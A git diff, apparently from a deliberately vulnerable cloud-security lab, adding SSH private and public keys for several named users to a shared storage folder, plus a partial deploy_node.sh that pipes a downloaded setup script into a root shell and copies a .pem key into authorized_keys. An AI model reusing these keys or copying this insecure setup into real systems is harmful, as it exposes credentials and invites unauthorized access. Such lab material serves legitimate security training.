+dff7u4WhqEJGUcA51NyU1PDcAYb892sSi0F5eO89SZoEYTsVo/WjPccmtRlsR5kO +1rpVYProMgJXHBeZUtukI0Z4rvW+9c8O7LGCmRIAR6MnPQTWL6HXkfpRKQ0MnfgM +PKCVprm0rAAtGAIkABzdUPhVIfKxreK48Y6M1+ArMSc4NQ7+lBKht7EqWj8gc6aP +8K+aewAQWPyMG83fRYicPZ7mDzFMM55wTqMOkfcwI4ApXciwFUCKRA== +-----END RSA PRIVATE KEY----- diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/john.pub b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/john.pub new file mode 100644 index 0000000..bcfcc9a --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/john.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDSkZpFYT2K2ExN/KGEs0QWQWF6c0kteoFNEUjvby7mg1ZAUniyovn1MOKSXls2Hev75Ep9TAtjPBra7x28wiQWyUYjhQAHolfjdCc+OorkP3UeD/nMQtLDx4NvzqQwVXF5Bxt8CfMp6oqhoWDpnYZJyWTr6AFxwHYsyQ4Tf1x5XqoWJDxXDzNTLQmfdSxGFZzrg5gAhM/GI2//jKEEj8OEMukMTsYyupl0npsxJVnPTD/5mkAokmlE7gdYxmnXDx1i7TNogMO0vSWoyT5BTolr/jEGNtMYxcUUgWnmDBhDBLhvF+2scgW9TQZX9NWoQ40Gu4KEw9V5VYQBUD6nrXxU1CDXmFMhAcfPmBsq22Jbt5Fvvji0c8tvqTurKPQ5ZGMdzFK7zieSiTYKthGAQ9HT031xOhU1ZLODCJhytbLNh6cImAa/v9e8MIAITuzytNMbFclqYrRFqzQxbfQq3FOS+H4komcgc3mXfcJrE23V59kewBcvy/UwNs7P9aEYmy0= john diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/justin.pem b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/justin.pem new file mode 100644 index 0000000..d7c1426 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/justin.pem @@ -0,0 +1,51 @@ +-----BEGIN RSA PRIVATE KEY----- +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 +-----END RSA PRIVATE KEY----- diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/justin.pub b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/justin.pub new file mode 100644 index 0000000..1511e2e --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/justin.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDjtdhLMR07Y+LMHfMoljmNKhoPd6hrBh5cyFTGOcMgxGXsuL7wMTAEe3BW9jeYbhWxf7Gscgx92O9b1vSgR3cuevhVxN84cA/AVer6t7LYxkggsEW7d4ttVsu52yv6u/zP5in+7IsJAp37SeCkkPdsP08vLoSodQnvRTdAx8Fze7hGU7o1haXllJjq/xQDtpKqCc4ZaglXYpvP4iDHkcsjbun/VbxQXUBXxbxHyC3wa1udEvnhp1/5jflorBGnoS2P3tD+KQiECqXca1+bvOcxmbHG/cmhYdOagZJKl+3g/WO//EhablliQsuAklcxqILvNpwdmrspiHbEmU/5o4/bZ5Lu+fI+YUt1ofNJXIoLpVgVrt5ntorFbQv5njthlzSYFm+k1Ts607aymqHtKJwHdBSkYzsDLQD3iMG4iHTO+5julLo31oyzFKjiH5dvQ/EX0LvTwDmCZYiKDHlsKPIdFdZm1CcZtjQUCehP9QuXHBLBDK6XBpY87Hwo5737nrF2uj4x8JwP0AlO5S6Urbkc6P4AtD2s9DYCBEqmZ5I4+woL9K+V4CnjfNESe0j6jQvDKklhFOk1g3oMyy8iXJweCwE9uQxD+zIApX4lJyf84sxo3uR8pigUriwHuWoWSHv2QbtPGS8t/hNZbPv1mR2B4b2fjode0Gy1912lqfDF6Q== kali@kali diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mary.pem b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mary.pem new file mode 100644 index 0000000..8485cd6 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mary.pem @@ -0,0 +1,39 @@ +-----BEGIN RSA PRIVATE KEY----- +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 +-----END RSA PRIVATE KEY----- diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mary.pub b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mary.pub new file mode 100644 index 0000000..cab867a --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mary.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCqk8WvfglNe230wXkencpbYmCo1z/tpY/AOSZPOTg4ZZMQcBfYPWeceSOSD4JlRQ6vPUCIPsBKv4Gfj1XlEiptens5g3TRskvjP4JasJ5seIFg3tAMorGB9fLG3JOOFYVUVUDKRCWoy3X4FZokUVAB3PCUhfUcwSbhfh+t8+4QUqxn478ffA5ZE4oFM+x2ZEfSLDvJ0WvgDmBxhiZ1mGWF2nvTNHr9fCN1XjA61RJnxjj61LxbzZgPWvx9nS+0IISa0Y7KunKCSuYLFvxyAP6U2xeqXx2TpzX1nxsy4RhLGQwgrfZgGs7qtLHE8HUVGL5uUJfQN0fY8drU7n/vZDb7ZTLDZgiNlv2GuTH0dX8cO4TOJJtgBIJ1yG0yK1DW5v/ZIU+sgFcajvCzPC6s3mapW+VmQ/kSr6Xj/hrBTHZ6ZdgLE7gvgfxQSO6D4aNp8bxxFWWgQqTkDFtPxGHKjywjCCfel2fYoRWaqMBgJRkUCFIrOcObQg6TOb56ZzoeVWk= mary diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mike.pem b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mike.pem new file mode 100644 index 0000000..b652ee6 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mike.pem @@ -0,0 +1,39 @@ +-----BEGIN RSA PRIVATE KEY----- +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 +-----END RSA PRIVATE KEY----- diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mike.pub b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mike.pub new file mode 100644 index 0000000..c1ebe07 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/mike.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC5e9y59/Dnq+8XdKrB/4UkeqDnbkNfRkHOSR7unz5+mvL0Pcq/JqNA1edro9F6WwKNl3l15bcnBrrjjSjOvc+I7OPlX1diAyfwmKetf4fMO/e7fuNNaIzeHHl72U4Kn5ZJGKpEhsOO6IfubobWj0bRHvcAbA6/Zv1LYzJeVae8qJattiC1Oe/6+qjzazeZaGU7t4wVOb/sq8s6+k568dVVz0ZG9EUsv24SMh7WdxpE6JwOJ8LySnhzJK06vZp+H1xj8RnugcqrePk/945JB4dS2dwzbzRxE+Wl4M/ez6/bAW7geLuUPTq08oRmY6iG15H/WpJNbhgf84X/v93tsRsNFbhxv4cQCPRhjgjBqRlkN9F2rFpoRxTtLxe+cZVmy8X7cMOELqn5yUtNvuNiLcEr3OshUhiAT1b8GsPTFNkNhHnlpgIx0ax/8MRrhcszIPmv7nrDhqu+kGdSkfQjmwnbqdZzr2z6lRlaWi4SNrlQaSSw0o+lAtKONoYrzZkXAz8= mike diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/sophia.pem b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/sophia.pem new file mode 100644 index 0000000..5926648 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/sophia.pem @@ -0,0 +1,39 @@ +-----BEGIN RSA PRIVATE KEY----- +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 +-----END RSA PRIVATE KEY----- diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/sophia.pub b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/sophia.pub new file mode 100644 index 0000000..db22eff --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/sophia.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8TbU83Zikoq2dWwKsbbKUqlvSj13zk3l7/pEgEhAMwhbSPvYIq+tLEA7req6LbOGT1rwEkBKuWA3K7iv/juAw33S6IbMKlyuycYvbAuTe3+xSFXpXcCvfxQhJ7qpqMESEXdfvf0/ateUn09K8YwPd4qpFJ/JA+ubBf1hxUDSwXa6j7UBAR83hXbO0tsB9VSDOzaj8kJvdMAt9li78NtTaw1GAtaKOrno1Zx9mgwgK1PXYji1vMQHxpTDcGdUI5hdkNAW7yzdflYQU4+4k25d+HTOVrAxskSN3SKPo0sam/u6z8cbaNucu/WGLzcYXbko/+s7bWfUxQ80jiWLPepBfJiBR7FMtRficwizxv6394ftdZFqnsx4F0QWrvAD3Q+pmBBDFU2Pf22uGurFc4GTe+IohWJQDpVD+WQvQ/PgWQTxoalMBiISxa/QTk/n8/YtFBt4I0n9ICZVU8POJVUz+hgJefjzzeKHTdz1O7LhXglCCss92LEONLYmnTn6+nQU= sophia diff --git a/modules/module-1/resources/storage_account/shared/scripts/deploy_node.sh b/modules/module-1/resources/storage_account/shared/scripts/deploy_node.sh new file mode 100644 index 0000000..448dcb8 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/scripts/deploy_node.sh @@ -0,0 +1,39 @@ +#!/bin/bash + +sudo adduser bob +sudo su - bob +mkdir .ssh +chmod 700 .ssh +touch .ssh/authorized_keys +chmod 600 .ssh/authorized_keys +aws s3 cp s3://BUCKET/keys/bob.pem ./ +cat bob.pem > .ssh/authorized_keys + +sudo yum install -y gcc-c++ make +curl -sL https://rpm.nodesource.com/setup_14.x | sudo -E bash - +sudo yum install -y nodejs + +sudo yum update -y +sudo yum install git -y + +git clone https://github.com/GermaVinsmoke/bmi-calculator.git +cd bmi-calculator +npm install + +npm run build + +sudo su +yum update -y +yum install -y httpd php +systemctl start httpd +systemctl enable httpd +usermod -a -G apache ec2-user +chown -R ec2-user:apache /var/www +chmod 2775 /var/www +find 